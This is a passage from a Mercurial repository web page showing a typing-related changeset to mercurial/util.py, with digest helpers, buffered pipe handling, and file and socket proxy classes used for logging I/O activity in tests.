##// END OF EJS Templates
typing: make minor adjustments to mercurial/util.py to pass pytype checking...
Matt Harbison -
r47663:51841b23 default
parent child Browse files
Show More
@@ -1,3732 +1,3735 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import locale
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37
38 38 from .thirdparty import attr
39 39 from .pycompat import (
40 40 delattr,
41 41 getattr,
42 42 open,
43 43 setattr,
44 44 )
45 45 from .node import hex
46 46 from hgdemandimport import tracing
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 policy,
52 52 pycompat,
53 53 urllibcompat,
54 54 )
55 55 from .utils import (
56 56 compression,
57 57 hashutil,
58 58 procutil,
59 59 stringutil,
60 60 )
61 61
62 62 if pycompat.TYPE_CHECKING:
63 63 from typing import (
64 64 Iterator,
65 65 List,
66 66 Optional,
67 67 Tuple,
68 68 Union,
69 69 )
70 70
71 71
72 72 base85 = policy.importmod('base85')
73 73 osutil = policy.importmod('osutil')
74 74
75 75 b85decode = base85.b85decode
76 76 b85encode = base85.b85encode
77 77
78 78 cookielib = pycompat.cookielib
79 79 httplib = pycompat.httplib
80 80 pickle = pycompat.pickle
81 81 safehasattr = pycompat.safehasattr
82 82 socketserver = pycompat.socketserver
83 83 bytesio = pycompat.bytesio
84 84 # TODO deprecate stringio name, as it is a lie on Python 3.
85 85 stringio = bytesio
86 86 xmlrpclib = pycompat.xmlrpclib
87 87
88 88 httpserver = urllibcompat.httpserver
89 89 urlerr = urllibcompat.urlerr
90 90 urlreq = urllibcompat.urlreq
91 91
92 92 # workaround for win32mbcs
93 93 _filenamebytestr = pycompat.bytestr
94 94
95 95 if pycompat.iswindows:
96 96 from . import windows as platform
97 97 else:
98 98 from . import posix as platform
99 99
100 100 _ = i18n._
101 101
102 102 bindunixsocket = platform.bindunixsocket
103 103 cachestat = platform.cachestat
104 104 checkexec = platform.checkexec
105 105 checklink = platform.checklink
106 106 copymode = platform.copymode
107 107 expandglobs = platform.expandglobs
108 108 getfsmountpoint = platform.getfsmountpoint
109 109 getfstype = platform.getfstype
110 110 groupmembers = platform.groupmembers
111 111 groupname = platform.groupname
112 112 isexec = platform.isexec
113 113 isowner = platform.isowner
114 114 listdir = osutil.listdir
115 115 localpath = platform.localpath
116 116 lookupreg = platform.lookupreg
117 117 makedir = platform.makedir
118 118 nlinks = platform.nlinks
119 119 normpath = platform.normpath
120 120 normcase = platform.normcase
121 121 normcasespec = platform.normcasespec
122 122 normcasefallback = platform.normcasefallback
123 123 openhardlinks = platform.openhardlinks
124 124 oslink = platform.oslink
125 125 parsepatchoutput = platform.parsepatchoutput
126 126 pconvert = platform.pconvert
127 127 poll = platform.poll
128 128 posixfile = platform.posixfile
129 129 readlink = platform.readlink
130 130 rename = platform.rename
131 131 removedirs = platform.removedirs
132 132 samedevice = platform.samedevice
133 133 samefile = platform.samefile
134 134 samestat = platform.samestat
135 135 setflags = platform.setflags
136 136 split = platform.split
137 137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
138 138 statisexec = platform.statisexec
139 139 statislink = platform.statislink
140 140 umask = platform.umask
141 141 unlink = platform.unlink
142 142 username = platform.username
143 143
144 144
145 145 def setumask(val):
146 146 # type: (int) -> None
147 147 ''' updates the umask. used by chg server '''
148 148 if pycompat.iswindows:
149 149 return
150 150 os.umask(val)
151 151 global umask
152 152 platform.umask = umask = val & 0o777
153 153
154 154
155 155 # small compat layer
156 156 compengines = compression.compengines
157 157 SERVERROLE = compression.SERVERROLE
158 158 CLIENTROLE = compression.CLIENTROLE
159 159
160 160 try:
161 161 recvfds = osutil.recvfds
162 162 except AttributeError:
163 163 pass
164 164
165 165 # Python compatibility
166 166
167 167 _notset = object()
168 168
169 169
170 170 def bitsfrom(container):
171 171 bits = 0
172 172 for bit in container:
173 173 bits |= bit
174 174 return bits
175 175
176 176
177 177 # python 2.6 still have deprecation warning enabled by default. We do not want
178 178 # to display anything to standard user so detect if we are running test and
179 179 # only use python deprecation warning in this case.
180 180 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
181 181 if _dowarn:
182 182 # explicitly unfilter our warning for python 2.7
183 183 #
184 184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 185 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
187 187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
188 188 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
189 189 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
190 190 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
191 191 if _dowarn and pycompat.ispy3:
192 192 # silence warning emitted by passing user string to re.sub()
193 193 warnings.filterwarnings(
194 194 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
195 195 )
196 196 warnings.filterwarnings(
197 197 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
198 198 )
199 199 # TODO: reinvent imp.is_frozen()
200 200 warnings.filterwarnings(
201 201 'ignore',
202 202 'the imp module is deprecated',
203 203 DeprecationWarning,
204 204 'mercurial',
205 205 )
206 206
207 207
208 208 def nouideprecwarn(msg, version, stacklevel=1):
209 209 """Issue an python native deprecation warning
210 210
211 211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 212 """
213 213 if _dowarn:
214 214 msg += (
215 215 b"\n(compatibility will be dropped after Mercurial-%s,"
216 216 b" update your code.)"
217 217 ) % version
218 218 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
219 219 # on python 3 with chg, we will need to explicitly flush the output
220 220 sys.stderr.flush()
221 221
222 222
223 223 DIGESTS = {
224 224 b'md5': hashlib.md5,
225 225 b'sha1': hashutil.sha1,
226 226 b'sha512': hashlib.sha512,
227 227 }
228 228 # List of digest types from strongest to weakest
229 229 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
230 230
231 231 for k in DIGESTS_BY_STRENGTH:
232 232 assert k in DIGESTS
233 233
234 234
235 235 class digester(object):
236 236 """helper to compute digests.
237 237
238 238 This helper can be used to compute one or more digests given their name.
239 239
240 240 >>> d = digester([b'md5', b'sha1'])
241 241 >>> d.update(b'foo')
242 242 >>> [k for k in sorted(d)]
243 243 ['md5', 'sha1']
244 244 >>> d[b'md5']
245 245 'acbd18db4cc2f85cedef654fccc4a4d8'
246 246 >>> d[b'sha1']
247 247 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
248 248 >>> digester.preferred([b'md5', b'sha1'])
249 249 'sha1'
250 250 """
251 251
252 252 def __init__(self, digests, s=b''):
253 253 self._hashes = {}
254 254 for k in digests:
255 255 if k not in DIGESTS:
256 256 raise error.Abort(_(b'unknown digest type: %s') % k)
257 257 self._hashes[k] = DIGESTS[k]()
258 258 if s:
259 259 self.update(s)
260 260
261 261 def update(self, data):
262 262 for h in self._hashes.values():
263 263 h.update(data)
264 264
265 265 def __getitem__(self, key):
266 266 if key not in DIGESTS:
267 267 raise error.Abort(_(b'unknown digest type: %s') % k)
268 268 return hex(self._hashes[key].digest())
269 269
270 270 def __iter__(self):
271 271 return iter(self._hashes)
272 272
273 273 @staticmethod
274 274 def preferred(supported):
275 275 """returns the strongest digest type in both supported and DIGESTS."""
276 276
277 277 for k in DIGESTS_BY_STRENGTH:
278 278 if k in supported:
279 279 return k
280 280 return None
281 281
282 282
283 283 class digestchecker(object):
284 284 """file handle wrapper that additionally checks content against a given
285 285 size and digests.
286 286
287 287 d = digestchecker(fh, size, {'md5': '...'})
288 288
289 289 When multiple digests are given, all of them are validated.
290 290 """
291 291
292 292 def __init__(self, fh, size, digests):
293 293 self._fh = fh
294 294 self._size = size
295 295 self._got = 0
296 296 self._digests = dict(digests)
297 297 self._digester = digester(self._digests.keys())
298 298
299 299 def read(self, length=-1):
300 300 content = self._fh.read(length)
301 301 self._digester.update(content)
302 302 self._got += len(content)
303 303 return content
304 304
305 305 def validate(self):
306 306 if self._size != self._got:
307 307 raise error.Abort(
308 308 _(b'size mismatch: expected %d, got %d')
309 309 % (self._size, self._got)
310 310 )
311 311 for k, v in self._digests.items():
312 312 if v != self._digester[k]:
313 313 # i18n: first parameter is a digest name
314 314 raise error.Abort(
315 315 _(b'%s mismatch: expected %s, got %s')
316 316 % (k, v, self._digester[k])
317 317 )
318 318
319 319
320 320 try:
321 321 buffer = buffer # pytype: disable=name-error
322 322 except NameError:
323 323
324 324 def buffer(sliceable, offset=0, length=None):
325 325 if length is not None:
326 326 return memoryview(sliceable)[offset : offset + length]
327 327 return memoryview(sliceable)[offset:]
328 328
329 329
330 330 _chunksize = 4096
331 331
332 332
333 333 class bufferedinputpipe(object):
334 334 """a manually buffered input pipe
335 335
336 336 Python will not let us use buffered IO and lazy reading with 'polling' at
337 337 the same time. We cannot probe the buffer state and select will not detect
338 338 that data are ready to read if they are already buffered.
339 339
340 340 This class let us work around that by implementing its own buffering
341 341 (allowing efficient readline) while offering a way to know if the buffer is
342 342 empty from the output (allowing collaboration of the buffer with polling).
343 343
344 344 This class lives in the 'util' module because it makes use of the 'os'
345 345 module from the python stdlib.
346 346 """
347 347
348 348 def __new__(cls, fh):
349 349 # If we receive a fileobjectproxy, we need to use a variation of this
350 350 # class that notifies observers about activity.
351 351 if isinstance(fh, fileobjectproxy):
352 352 cls = observedbufferedinputpipe
353 353
354 354 return super(bufferedinputpipe, cls).__new__(cls)
355 355
356 356 def __init__(self, input):
357 357 self._input = input
358 358 self._buffer = []
359 359 self._eof = False
360 360 self._lenbuf = 0
361 361
362 362 @property
363 363 def hasbuffer(self):
364 364 """True is any data is currently buffered
365 365
366 366 This will be used externally a pre-step for polling IO. If there is
367 367 already data then no polling should be set in place."""
368 368 return bool(self._buffer)
369 369
370 370 @property
371 371 def closed(self):
372 372 return self._input.closed
373 373
374 374 def fileno(self):
375 375 return self._input.fileno()
376 376
377 377 def close(self):
378 378 return self._input.close()
379 379
380 380 def read(self, size):
381 381 while (not self._eof) and (self._lenbuf < size):
382 382 self._fillbuffer()
383 383 return self._frombuffer(size)
384 384
385 385 def unbufferedread(self, size):
386 386 if not self._eof and self._lenbuf == 0:
387 387 self._fillbuffer(max(size, _chunksize))
388 388 return self._frombuffer(min(self._lenbuf, size))
389 389
390 390 def readline(self, *args, **kwargs):
391 391 if len(self._buffer) > 1:
392 392 # this should not happen because both read and readline end with a
393 393 # _frombuffer call that collapse it.
394 394 self._buffer = [b''.join(self._buffer)]
395 395 self._lenbuf = len(self._buffer[0])
396 396 lfi = -1
397 397 if self._buffer:
398 398 lfi = self._buffer[-1].find(b'\n')
399 399 while (not self._eof) and lfi < 0:
400 400 self._fillbuffer()
401 401 if self._buffer:
402 402 lfi = self._buffer[-1].find(b'\n')
403 403 size = lfi + 1
404 404 if lfi < 0: # end of file
405 405 size = self._lenbuf
406 406 elif len(self._buffer) > 1:
407 407 # we need to take previous chunks into account
408 408 size += self._lenbuf - len(self._buffer[-1])
409 409 return self._frombuffer(size)
410 410
411 411 def _frombuffer(self, size):
412 412 """return at most 'size' data from the buffer
413 413
414 414 The data are removed from the buffer."""
415 415 if size == 0 or not self._buffer:
416 416 return b''
417 417 buf = self._buffer[0]
418 418 if len(self._buffer) > 1:
419 419 buf = b''.join(self._buffer)
420 420
421 421 data = buf[:size]
422 422 buf = buf[len(data) :]
423 423 if buf:
424 424 self._buffer = [buf]
425 425 self._lenbuf = len(buf)
426 426 else:
427 427 self._buffer = []
428 428 self._lenbuf = 0
429 429 return data
430 430
431 431 def _fillbuffer(self, size=_chunksize):
432 432 """read data to the buffer"""
433 433 data = os.read(self._input.fileno(), size)
434 434 if not data:
435 435 self._eof = True
436 436 else:
437 437 self._lenbuf += len(data)
438 438 self._buffer.append(data)
439 439
440 440 return data
441 441
442 442
443 443 def mmapread(fp, size=None):
444 444 if size == 0:
445 445 # size of 0 to mmap.mmap() means "all data"
446 446 # rather than "zero bytes", so special case that.
447 447 return b''
448 448 elif size is None:
449 449 size = 0
450 450 try:
451 451 fd = getattr(fp, 'fileno', lambda: fp)()
452 452 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
453 453 except ValueError:
454 454 # Empty files cannot be mmapped, but mmapread should still work. Check
455 455 # if the file is empty, and if so, return an empty buffer.
456 456 if os.fstat(fd).st_size == 0:
457 457 return b''
458 458 raise
459 459
460 460
461 461 class fileobjectproxy(object):
462 462 """A proxy around file objects that tells a watcher when events occur.
463 463
464 464 This type is intended to only be used for testing purposes. Think hard
465 465 before using it in important code.
466 466 """
467 467
468 468 __slots__ = (
469 469 '_orig',
470 470 '_observer',
471 471 )
472 472
473 473 def __init__(self, fh, observer):
474 474 object.__setattr__(self, '_orig', fh)
475 475 object.__setattr__(self, '_observer', observer)
476 476
477 477 def __getattribute__(self, name):
478 478 ours = {
479 479 '_observer',
480 480 # IOBase
481 481 'close',
482 482 # closed if a property
483 483 'fileno',
484 484 'flush',
485 485 'isatty',
486 486 'readable',
487 487 'readline',
488 488 'readlines',
489 489 'seek',
490 490 'seekable',
491 491 'tell',
492 492 'truncate',
493 493 'writable',
494 494 'writelines',
495 495 # RawIOBase
496 496 'read',
497 497 'readall',
498 498 'readinto',
499 499 'write',
500 500 # BufferedIOBase
501 501 # raw is a property
502 502 'detach',
503 503 # read defined above
504 504 'read1',
505 505 # readinto defined above
506 506 # write defined above
507 507 }
508 508
509 509 # We only observe some methods.
510 510 if name in ours:
511 511 return object.__getattribute__(self, name)
512 512
513 513 return getattr(object.__getattribute__(self, '_orig'), name)
514 514
515 515 def __nonzero__(self):
516 516 return bool(object.__getattribute__(self, '_orig'))
517 517
518 518 __bool__ = __nonzero__
519 519
520 520 def __delattr__(self, name):
521 521 return delattr(object.__getattribute__(self, '_orig'), name)
522 522
523 523 def __setattr__(self, name, value):
524 524 return setattr(object.__getattribute__(self, '_orig'), name, value)
525 525
526 526 def __iter__(self):
527 527 return object.__getattribute__(self, '_orig').__iter__()
528 528
529 529 def _observedcall(self, name, *args, **kwargs):
530 530 # Call the original object.
531 531 orig = object.__getattribute__(self, '_orig')
532 532 res = getattr(orig, name)(*args, **kwargs)
533 533
534 534 # Call a method on the observer of the same name with arguments
535 535 # so it can react, log, etc.
536 536 observer = object.__getattribute__(self, '_observer')
537 537 fn = getattr(observer, name, None)
538 538 if fn:
539 539 fn(res, *args, **kwargs)
540 540
541 541 return res
542 542
543 543 def close(self, *args, **kwargs):
544 544 return object.__getattribute__(self, '_observedcall')(
545 545 'close', *args, **kwargs
546 546 )
547 547
548 548 def fileno(self, *args, **kwargs):
549 549 return object.__getattribute__(self, '_observedcall')(
550 550 'fileno', *args, **kwargs
551 551 )
552 552
553 553 def flush(self, *args, **kwargs):
554 554 return object.__getattribute__(self, '_observedcall')(
555 555 'flush', *args, **kwargs
556 556 )
557 557
558 558 def isatty(self, *args, **kwargs):
559 559 return object.__getattribute__(self, '_observedcall')(
560 560 'isatty', *args, **kwargs
561 561 )
562 562
563 563 def readable(self, *args, **kwargs):
564 564 return object.__getattribute__(self, '_observedcall')(
565 565 'readable', *args, **kwargs
566 566 )
567 567
568 568 def readline(self, *args, **kwargs):
569 569 return object.__getattribute__(self, '_observedcall')(
570 570 'readline', *args, **kwargs
571 571 )
572 572
573 573 def readlines(self, *args, **kwargs):
574 574 return object.__getattribute__(self, '_observedcall')(
575 575 'readlines', *args, **kwargs
576 576 )
577 577
578 578 def seek(self, *args, **kwargs):
579 579 return object.__getattribute__(self, '_observedcall')(
580 580 'seek', *args, **kwargs
581 581 )
582 582
583 583 def seekable(self, *args, **kwargs):
584 584 return object.__getattribute__(self, '_observedcall')(
585 585 'seekable', *args, **kwargs
586 586 )
587 587
588 588 def tell(self, *args, **kwargs):
589 589 return object.__getattribute__(self, '_observedcall')(
590 590 'tell', *args, **kwargs
591 591 )
592 592
593 593 def truncate(self, *args, **kwargs):
594 594 return object.__getattribute__(self, '_observedcall')(
595 595 'truncate', *args, **kwargs
596 596 )
597 597
598 598 def writable(self, *args, **kwargs):
599 599 return object.__getattribute__(self, '_observedcall')(
600 600 'writable', *args, **kwargs
601 601 )
602 602
603 603 def writelines(self, *args, **kwargs):
604 604 return object.__getattribute__(self, '_observedcall')(
605 605 'writelines', *args, **kwargs
606 606 )
607 607
608 608 def read(self, *args, **kwargs):
609 609 return object.__getattribute__(self, '_observedcall')(
610 610 'read', *args, **kwargs
611 611 )
612 612
613 613 def readall(self, *args, **kwargs):
614 614 return object.__getattribute__(self, '_observedcall')(
615 615 'readall', *args, **kwargs
616 616 )
617 617
618 618 def readinto(self, *args, **kwargs):
619 619 return object.__getattribute__(self, '_observedcall')(
620 620 'readinto', *args, **kwargs
621 621 )
622 622
623 623 def write(self, *args, **kwargs):
624 624 return object.__getattribute__(self, '_observedcall')(
625 625 'write', *args, **kwargs
626 626 )
627 627
628 628 def detach(self, *args, **kwargs):
629 629 return object.__getattribute__(self, '_observedcall')(
630 630 'detach', *args, **kwargs
631 631 )
632 632
633 633 def read1(self, *args, **kwargs):
634 634 return object.__getattribute__(self, '_observedcall')(
635 635 'read1', *args, **kwargs
636 636 )
637 637
638 638
639 639 class observedbufferedinputpipe(bufferedinputpipe):
640 640 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
641 641
642 642 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
643 643 bypass ``fileobjectproxy``. Because of this, we need to make
644 644 ``bufferedinputpipe`` aware of these operations.
645 645
646 646 This variation of ``bufferedinputpipe`` can notify observers about
647 647 ``os.read()`` events. It also re-publishes other events, such as
648 648 ``read()`` and ``readline()``.
649 649 """
650 650
651 651 def _fillbuffer(self):
652 652 res = super(observedbufferedinputpipe, self)._fillbuffer()
653 653
654 654 fn = getattr(self._input._observer, 'osread', None)
655 655 if fn:
656 656 fn(res, _chunksize)
657 657
658 658 return res
659 659
660 660 # We use different observer methods because the operation isn't
661 661 # performed on the actual file object but on us.
662 662 def read(self, size):
663 663 res = super(observedbufferedinputpipe, self).read(size)
664 664
665 665 fn = getattr(self._input._observer, 'bufferedread', None)
666 666 if fn:
667 667 fn(res, size)
668 668
669 669 return res
670 670
671 671 def readline(self, *args, **kwargs):
672 672 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
673 673
674 674 fn = getattr(self._input._observer, 'bufferedreadline', None)
675 675 if fn:
676 676 fn(res)
677 677
678 678 return res
679 679
680 680
681 681 PROXIED_SOCKET_METHODS = {
682 682 'makefile',
683 683 'recv',
684 684 'recvfrom',
685 685 'recvfrom_into',
686 686 'recv_into',
687 687 'send',
688 688 'sendall',
689 689 'sendto',
690 690 'setblocking',
691 691 'settimeout',
692 692 'gettimeout',
693 693 'setsockopt',
694 694 }
695 695
696 696
697 697 class socketproxy(object):
698 698 """A proxy around a socket that tells a watcher when events occur.
699 699
700 700 This is like ``fileobjectproxy`` except for sockets.
701 701
702 702 This type is intended to only be used for testing purposes. Think hard
703 703 before using it in important code.
704 704 """
705 705
706 706 __slots__ = (
707 707 '_orig',
708 708 '_observer',
709 709 )
710 710
711 711 def __init__(self, sock, observer):
712 712 object.__setattr__(self, '_orig', sock)
713 713 object.__setattr__(self, '_observer', observer)
714 714
715 715 def __getattribute__(self, name):
716 716 if name in PROXIED_SOCKET_METHODS:
717 717 return object.__getattribute__(self, name)
718 718
719 719 return getattr(object.__getattribute__(self, '_orig'), name)
720 720
721 721 def __delattr__(self, name):
722 722 return delattr(object.__getattribute__(self, '_orig'), name)
723 723
724 724 def __setattr__(self, name, value):
725 725 return setattr(object.__getattribute__(self, '_orig'), name, value)
726 726
727 727 def __nonzero__(self):
728 728 return bool(object.__getattribute__(self, '_orig'))
729 729
730 730 __bool__ = __nonzero__
731 731
732 732 def _observedcall(self, name, *args, **kwargs):
733 733 # Call the original object.
734 734 orig = object.__getattribute__(self, '_orig')
735 735 res = getattr(orig, name)(*args, **kwargs)
736 736
737 737 # Call a method on the observer of the same name with arguments
738 738 # so it can react, log, etc.
739 739 observer = object.__getattribute__(self, '_observer')
740 740 fn = getattr(observer, name, None)
741 741 if fn:
742 742 fn(res, *args, **kwargs)
743 743
744 744 return res
745 745
746 746 def makefile(self, *args, **kwargs):
747 747 res = object.__getattribute__(self, '_observedcall')(
748 748 'makefile', *args, **kwargs
749 749 )
750 750
751 751 # The file object may be used for I/O. So we turn it into a
752 752 # proxy using our observer.
753 753 observer = object.__getattribute__(self, '_observer')
754 754 return makeloggingfileobject(
755 755 observer.fh,
756 756 res,
757 757 observer.name,
758 758 reads=observer.reads,
759 759 writes=observer.writes,
760 760 logdata=observer.logdata,
761 761 logdataapis=observer.logdataapis,
762 762 )
763 763
764 764 def recv(self, *args, **kwargs):
765 765 return object.__getattribute__(self, '_observedcall')(
766 766 'recv', *args, **kwargs
767 767 )
768 768
769 769 def recvfrom(self, *args, **kwargs):
770 770 return object.__getattribute__(self, '_observedcall')(
771 771 'recvfrom', *args, **kwargs
772 772 )
773 773
774 774 def recvfrom_into(self, *args, **kwargs):
775 775 return object.__getattribute__(self, '_observedcall')(
776 776 'recvfrom_into', *args, **kwargs
777 777 )
778 778
779 779 def recv_into(self, *args, **kwargs):
780 780 return object.__getattribute__(self, '_observedcall')(
781 781 'recv_info', *args, **kwargs
782 782 )
783 783
784 784 def send(self, *args, **kwargs):
785 785 return object.__getattribute__(self, '_observedcall')(
786 786 'send', *args, **kwargs
787 787 )
788 788
789 789 def sendall(self, *args, **kwargs):
790 790 return object.__getattribute__(self, '_observedcall')(
791 791 'sendall', *args, **kwargs
792 792 )
793 793
794 794 def sendto(self, *args, **kwargs):
795 795 return object.__getattribute__(self, '_observedcall')(
796 796 'sendto', *args, **kwargs
797 797 )
798 798
799 799 def setblocking(self, *args, **kwargs):
800 800 return object.__getattribute__(self, '_observedcall')(
801 801 'setblocking', *args, **kwargs
802 802 )
803 803
804 804 def settimeout(self, *args, **kwargs):
805 805 return object.__getattribute__(self, '_observedcall')(
806 806 'settimeout', *args, **kwargs
807 807 )
808 808
809 809 def gettimeout(self, *args, **kwargs):
810 810 return object.__getattribute__(self, '_observedcall')(
811 811 'gettimeout', *args, **kwargs
812 812 )
813 813
814 814 def setsockopt(self, *args, **kwargs):
815 815 return object.__getattribute__(self, '_observedcall')(
816 816 'setsockopt', *args, **kwargs
817 817 )
818 818
819 819
820 820 class baseproxyobserver(object):
821 821 def __init__(self, fh, name, logdata, logdataapis):
822 822 self.fh = fh
823 823 self.name = name
824 824 self.logdata = logdata
825 825 self.logdataapis = logdataapis
826 826
827 827 def _writedata(self, data):
828 828 if not self.logdata:
829 829 if self.logdataapis:
830 830 self.fh.write(b'\n')
831 831 self.fh.flush()
832 832 return
833 833
834 834 # Simple case writes all data on a single line.
835 835 if b'\n' not in data:
836 836 if self.logdataapis:
837 837 self.fh.write(b': %s\n' % stringutil.escapestr(data))
838 838 else:
839 839 self.fh.write(
840 840 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
841 841 )
842 842 self.fh.flush()
843 843 return
844 844
845 845 # Data with newlines is written to multiple lines.
846 846 if self.logdataapis:
847 847 self.fh.write(b':\n')
848 848
849 849 lines = data.splitlines(True)
850 850 for line in lines:
851 851 self.fh.write(
852 852 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
853 853 )
854 854 self.fh.flush()
855 855
856 856
857 857 class fileobjectobserver(baseproxyobserver):
858 858 """Logs file object activity."""
859 859
860 860 def __init__(
861 861 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
862 862 ):
863 863 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
864 864 self.reads = reads
865 865 self.writes = writes
866 866
867 867 def read(self, res, size=-1):
868 868 if not self.reads:
869 869 return
870 870 # Python 3 can return None from reads at EOF instead of empty strings.
871 871 if res is None:
872 872 res = b''
873 873
874 874 if size == -1 and res == b'':
875 875 # Suppress pointless read(-1) calls that return
876 876 # nothing. These happen _a lot_ on Python 3, and there
877 877 # doesn't seem to be a better workaround to have matching
878 878 # Python 2 and 3 behavior. :(
879 879 return
880 880
881 881 if self.logdataapis:
882 882 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
883 883
884 884 self._writedata(res)
885 885
886 886 def readline(self, res, limit=-1):
887 887 if not self.reads:
888 888 return
889 889
890 890 if self.logdataapis:
891 891 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
892 892
893 893 self._writedata(res)
894 894
895 895 def readinto(self, res, dest):
896 896 if not self.reads:
897 897 return
898 898
899 899 if self.logdataapis:
900 900 self.fh.write(
901 901 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
902 902 )
903 903
904 904 data = dest[0:res] if res is not None else b''
905 905
906 906 # _writedata() uses "in" operator and is confused by memoryview because
907 907 # characters are ints on Python 3.
908 908 if isinstance(data, memoryview):
909 909 data = data.tobytes()
910 910
911 911 self._writedata(data)
912 912
913 913 def write(self, res, data):
914 914 if not self.writes:
915 915 return
916 916
917 917 # Python 2 returns None from some write() calls. Python 3 (reasonably)
918 918 # returns the integer bytes written.
919 919 if res is None and data:
920 920 res = len(data)
921 921
922 922 if self.logdataapis:
923 923 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
924 924
925 925 self._writedata(data)
926 926
927 927 def flush(self, res):
928 928 if not self.writes:
929 929 return
930 930
931 931 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
932 932
933 933 # For observedbufferedinputpipe.
934 934 def bufferedread(self, res, size):
935 935 if not self.reads:
936 936 return
937 937
938 938 if self.logdataapis:
939 939 self.fh.write(
940 940 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
941 941 )
942 942
943 943 self._writedata(res)
944 944
945 945 def bufferedreadline(self, res):
946 946 if not self.reads:
947 947 return
948 948
949 949 if self.logdataapis:
950 950 self.fh.write(
951 951 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
952 952 )
953 953
954 954 self._writedata(res)
955 955
956 956
957 957 def makeloggingfileobject(
958 958 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
959 959 ):
960 960 """Turn a file object into a logging file object."""
961 961
962 962 observer = fileobjectobserver(
963 963 logh,
964 964 name,
965 965 reads=reads,
966 966 writes=writes,
967 967 logdata=logdata,
968 968 logdataapis=logdataapis,
969 969 )
970 970 return fileobjectproxy(fh, observer)
971 971
972 972
973 973 class socketobserver(baseproxyobserver):
974 974 """Logs socket activity."""
975 975
976 976 def __init__(
977 977 self,
978 978 fh,
979 979 name,
980 980 reads=True,
981 981 writes=True,
982 982 states=True,
983 983 logdata=False,
984 984 logdataapis=True,
985 985 ):
986 986 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
987 987 self.reads = reads
988 988 self.writes = writes
989 989 self.states = states
990 990
991 991 def makefile(self, res, mode=None, bufsize=None):
992 992 if not self.states:
993 993 return
994 994
995 995 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
996 996
997 997 def recv(self, res, size, flags=0):
998 998 if not self.reads:
999 999 return
1000 1000
1001 1001 if self.logdataapis:
1002 1002 self.fh.write(
1003 1003 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
1004 1004 )
1005 1005 self._writedata(res)
1006 1006
1007 1007 def recvfrom(self, res, size, flags=0):
1008 1008 if not self.reads:
1009 1009 return
1010 1010
1011 1011 if self.logdataapis:
1012 1012 self.fh.write(
1013 1013 b'%s> recvfrom(%d, %d) -> %d'
1014 1014 % (self.name, size, flags, len(res[0]))
1015 1015 )
1016 1016
1017 1017 self._writedata(res[0])
1018 1018
1019 1019 def recvfrom_into(self, res, buf, size, flags=0):
1020 1020 if not self.reads:
1021 1021 return
1022 1022
1023 1023 if self.logdataapis:
1024 1024 self.fh.write(
1025 1025 b'%s> recvfrom_into(%d, %d) -> %d'
1026 1026 % (self.name, size, flags, res[0])
1027 1027 )
1028 1028
1029 1029 self._writedata(buf[0 : res[0]])
1030 1030
1031 1031 def recv_into(self, res, buf, size=0, flags=0):
1032 1032 if not self.reads:
1033 1033 return
1034 1034
1035 1035 if self.logdataapis:
1036 1036 self.fh.write(
1037 1037 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1038 1038 )
1039 1039
1040 1040 self._writedata(buf[0:res])
1041 1041
1042 1042 def send(self, res, data, flags=0):
1043 1043 if not self.writes:
1044 1044 return
1045 1045
1046 1046 self.fh.write(
1047 1047 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1048 1048 )
1049 1049 self._writedata(data)
1050 1050
1051 1051 def sendall(self, res, data, flags=0):
1052 1052 if not self.writes:
1053 1053 return
1054 1054
1055 1055 if self.logdataapis:
1056 1056 # Returns None on success. So don't bother reporting return value.
1057 1057 self.fh.write(
1058 1058 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1059 1059 )
1060 1060
1061 1061 self._writedata(data)
1062 1062
